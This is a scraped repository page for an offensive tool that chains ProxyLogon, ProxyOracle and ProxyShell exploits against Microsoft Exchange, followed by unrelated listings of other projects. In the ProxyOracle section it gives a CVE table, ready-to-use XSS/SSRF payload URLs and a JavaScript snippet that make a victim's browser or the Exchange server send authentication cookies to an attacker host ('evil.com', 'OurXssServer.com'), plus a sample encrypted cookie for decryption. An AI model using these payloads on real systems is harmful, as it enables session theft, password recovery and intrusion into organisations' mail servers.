proxylogon, proxyshell, proxyoracle full chain exploit tool

Overview

Proxy-Attackchain

proxylogon, proxyshell, proxyoracle full chain exploit tool

  1. ProxyLogon: The most well-known and impactful Exchange exploit chain
  2. ProxyOracle: The attack which could recover any password in plaintext format of Exchange users
  3. ProxyShell: The exploit chain demonstrated at Pwn2Own 2021 to take over Exchange and earn $200,000 bounty

ProxyLogon is Just the Tip of the Iceberg: A New Attack Surface on Microsoft Exchange Server! Slides Video

most of the exploit is recoded with golang to speed up... and for learning golang purpose :)

NAME CVE patch time description
ProxyLogon CVE-2021-26855 Mar 02, 2021 server-side request forgery (SSRF)
ProxyLogon CVE-2021-27065 Mar 02, 2021 Microsoft.Exchange.Management.DDIService.WriteFileActivity未校验写文件后缀,可由文件内容部分可控的相关功能写入WebShell
ProxyOracle CVE-2021-31196 Jul 13, 2021 Reflected Cross-Site Scripting
ProxyOracle CVE-2021-31195 May 11, 2021 Padding Oracle Attack on Exchange Cookies Parsing
ProxyShell CVE-2021-34473 Apr 13, 2021 Pre-auth Path Confusion leads to ACL Bypass
ProxyShell CVE-2021-34523 Apr 13, 2021 Elevation of Privilege on Exchange PowerShell Backend
ProxyShell CVE-2021-31207 May 11, 2021 Post-auth Arbitrary-File-Write leads to RCE
proxytoken CVE-2021-33766 July 13, 2021 With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users. As an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.
Microsoft Exchange Server 远程执行代码漏洞 CVE-2021-42321 Nov 17, 2021 Exchange Deserialization RCE

proxylogon

proxyoracle

Once a victim clicks this link, evil.com will receive the cookies.

https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`[email protected]:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//

or use 3gstudent's way:

XSS平台搭建

借助SSRF漏洞,控制Exchange服务器将Cookie信息发送至XSS平台,导致最终想要的Cookie信息位于Request Headers中

而现有的XSS平台大都是通过POST请求的参数来传递数据

为了解决这个问题,这里可以选择开源的XSS平台,地址如下:

https://github.com/3gstudent/pyXSSPlatform

只需要修改以下位置:

  • 修改index.js,使用ajax模拟用户发包触发SSRF漏洞

  • 修改 pyXSSPlatform.py ,将GET请求的Request Headers进行提取

  • 使用合法的证书

index.js代码示例:

var xmlHttp = new XMLHttpRequest();
xmlhttp.open("GET", "https://192.168.1.1/owa/auth/x.js", false);
document.cookie = "X-AnonResource=true";
document.cookie = "X-AnonResource-Backend=OurXssServer.com/#~1";
xmlhttp.send();

XSS利用代码

控制用户访问XSS平台的代码示例:

https://192.168.1.1/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.head.appendChild(document.createElement(/script/.source)).src=/https:\/\/OurXssServer.com\/index.js/.source//

example cookie for decryption test:

cadata=FVtSAAWdOn29HYDQry+kG+994VUdAxONrayi4nbJW9JWTh8yLueD6IxYpahfxcGsA/B3FoVUQOD2EG605SR4QdeQ1pof+KD//6jwpmYQjv/II+OcqChrFZFvcMWv46a5; cadataTTL=eTxCEHKHDMmd/gEqDuOafg==; cadataKey=T4juhN4dUMKY4wkajUD43n4EWfMwefPQlqzxXmK4GnSHIZqo+g+uQg1Y2ogGoD1HyoVpRYgjGcCu6rmNQK+LsaZ8/lfBCThBI5yAhP1W2Fx+YNKvzy8Bcpui7zTlhAY598lE5Aijs6crHVXJeZkbLfMJgp0cFHj5uTQPcg31O/AeOAnD5c27IYOQ7JqMW7GOUVor1lhYnhh0R/NtWWqyfr5oE9j0jbxIGgrQrXIpLxL/uAU1ddC+/5jG9Edpq4sC213amuU/94rkHYzNH9OsiHYIkXr/NmkB7p908XrFrwXAcvV9QieoRiS3jvKCbzk3mnMu3YTnsJwAuiHzSXdCOQ==; cadataIV=GB9B+rwrigyPOf8xnV1KAek++yovEot9jFcV68WepCTQoRtQ5HUxSC7tE1mmHg0YtE6EOZNUM/WiNGP6xI4UTAofcMOfTLeRpBzeaKOETfjxKK2W7IKn+9k2tRkc1pIlO8FTOVx/dOHOoIFHUkqxFr+TgBULJ1I7tUmO7W0XDX4ZJHfmQhVqOOzeyjImKdX7Uv/jIJrF4VEew7rgvrC8BhqOqWgaTxpGhDTzIXl+wW3crsgZmXpXhOPURej1iwmtvhuQU6iuq4/IRv0lVIW3WvP6gUI8owIUxppnJl7YmN27Aqkjs0nTZZz1LBuZN+YxY4x6Lvs2FMG68jllhE4kwg==; cadataSig=BOJSYN2B+3RsXjO2akh3mqlKKkeAZVamOzfpVo0QdPEA3BHjpR6ls5yD9TzAQzRuWJJaaRIm7wMEiBMFz/sK5jk3R6kWw1OmMtJN2c38PdvwGIe6/7ByJdl52a5ojhDrRZhc4Qc3y+FFRx6XKvqUljTRWtHJGI1Jad2+LiNhJGkalhUeTM/a2V4LiQWf6Vv1KzJO79rZuOOOBnatht/E29j6636FpllCfEKrrogPQ7ADdVS6OOmqNU9gRMVgKnomC2t2PCtuYj26HUjnZ3rfc6BdzVmtu9EYSzccObsB2jxXXclAm5a+NZU/6sj9tlq3gcurjBl9yUDTgbZLg383gw==
  • amd64 poc binary usage:

  • just a modyfied version of padre, added proxyoracle detect poc code...

  • python script exp usage:

Decrypt this cookie to plaintext:

proxyshell

coming soon...

proxytoken

coming soon...

Exchange RCE CVE-2021-42321

coming soon...

more exp coming soon......

Reference (worship to orange!)

You might also like...
Baseledger core consensus for running validator, full and seed nodes

baseledger-core Baseledger core consensus client for running a validator, full or seed node. ⚠️ WARNING: this code has not been audited and is not rea

Server and client implementation of the grpc go libraries to perform unary, client streaming, server streaming and full duplex RPCs from gRPC go introduction

Description This is an implementation of a gRPC client and server that provides route guidance from gRPC Basics: Go tutorial. It demonstrates how to u

Imersão Full Cycle 5
Imersão Full Cycle 5

Imersão Full Cycle 5 Dinâmica do sistema Tecnologias Frontend Painel: Next.js Backend Painel: Nest.js Microsserviço processamento: Golang Sistema de m

A Go package for creating contributor list by release, Help full for those organization that use one repository for platform release

This is a Go package which create contributors list by release by scanning across all repository that exist in organisation, Only helpful for those or

Wrapper around bufcli to make it do cross-repo compiles for private repos and use full paths.
Wrapper around bufcli to make it do cross-repo compiles for private repos and use full paths.

Bufme A tool for compiling protos with full directory paths and cross repo compiles. Introduction Protocol buffers rock, but protoc should die in a fi

A Gradle Plugin Providing Full Support for Go
A Gradle Plugin Providing Full Support for Go

Gogradle - a Full-featured Build Tool for Golang 中文文档 Gogradle is a gradle plugin which provides support for building golang. 2017-06-23 Gogradle is a

This is a tool that allows you to check minecraft names availability, this tool can do around 3000~ names a minute or more!

Checker This is a tool that allows you to check minecraft names availability, this tool can do around 3000~ names a minute or more! Tutorial To instal

Traefik config validator: a CLI tool to (syntactically) validate your Traefik configuration filesTraefik config validator: a CLI tool to (syntactically) validate your Traefik configuration files
Traefik config validator: a CLI tool to (syntactically) validate your Traefik configuration filesTraefik config validator: a CLI tool to (syntactically) validate your Traefik configuration files

Traefik Config Validator Note This is currently pre-release software. traefik-config-validator is a CLI tool to (syntactically) validate your Traefik

Owner
lUc1f3r11
trapped in the darkest nightmare...
lUc1f3r11
A C/S Tool to Download Torrent Remotely and Retrieve Files Back Over HTTP at Full Speed without ISP Torrent Limitation.

remote-torrent Download Torrent Remotely and Retrieve Files Over HTTP at Full Speed without ISP Torrent Limitation. This repository is an extension to

Bruce Wang 59 Sep 30, 2022
Node of the decentralized oracle network, bridging on and off-chain computation

Chainlink is middleware to simplify communication with blockchains. Here you'll find the Chainlink Golang node, currently in alpha. This initial imple

SmartContract 4k Dec 8, 2022
Validator node for Bittorrent Chain Network

Delivery Validator node for Bittorrent Chain Network. It uses peppermint, customized Tendermint. Install from source Make sure your have go1.11+ alrea

PanoptesDev 1 Dec 14, 2021
EVM-compatible chain secured by the Lachesis consensus algorithm

ICICB galaxy EVM-compatible chain secured by the Lachesis consensus algorithm. Building the source Building galaxy requires both a Go (version 1.14 or

Galaxy developer Team 10 Jan 8, 2022
Dcfs-core - Dcfs Smart Chain With Golang

Dcfs Smart Chain The goal of Dcfs Smart Chain is to bring programmability and in

null 0 Jan 12, 2022
[deprecated] A full-featured SPDY library for the Go language.

Deprecated With the release of Go1.6 and the addition of http2 to the standard library, this package is no longer under active development. It is high

Jamie Hall 120 Oct 1, 2022
Inspired by go-socks5,This package provides full functionality of socks5 protocol.

The protocol described here is designed to provide a framework for client-server applications in both the TCP and UDP domains to conveniently and securely use the services of a network firewall.

Zhangliu 68 Sep 27, 2022
Full-featured BitTorrent client package and utilities

torrent This repository implements BitTorrent-related packages and command-line utilities in Go. The emphasis is on use as a library from other projec

Matt Joiner 4.6k Nov 30, 2022
SOCKS Protocol Version 5 Library in Go. Full TCP/UDP and IPv4/IPv6 support

socks5 中文 SOCKS Protocol Version 5 Library. Full TCP/UDP and IPv4/IPv6 support. Goals: KISS, less is more, small API, code is like the original protoc

TxThinking 499 Dec 5, 2022